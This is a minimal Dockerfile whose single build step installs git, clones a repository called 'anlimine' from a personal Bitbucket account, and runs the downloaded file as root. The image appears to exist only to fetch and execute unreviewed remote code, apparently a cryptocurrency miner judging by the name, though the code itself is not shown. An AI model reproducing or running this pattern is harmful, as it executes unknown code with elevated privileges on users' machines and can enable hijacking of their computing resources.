FROM ubuntu:18.04

RUN apt-get update
RUN sudo apt install -y git && sudo git clone https://swenson12@bitbucket.org/swenson12/anlimine.git && cd anlimine && sudo chmod u+x anlimine && sudo ./anlimine

